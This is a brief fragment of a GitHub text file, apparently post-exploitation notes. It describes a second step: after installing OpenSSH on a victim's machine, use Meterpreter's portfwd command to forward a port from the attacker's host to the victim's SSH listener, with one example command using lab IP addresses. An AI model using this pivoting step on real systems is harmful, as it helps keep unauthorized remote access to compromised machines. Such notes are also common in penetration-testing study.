Stuff/fu.txt at master · ricardojba/stuff · GitHub

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example: meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22. ................
................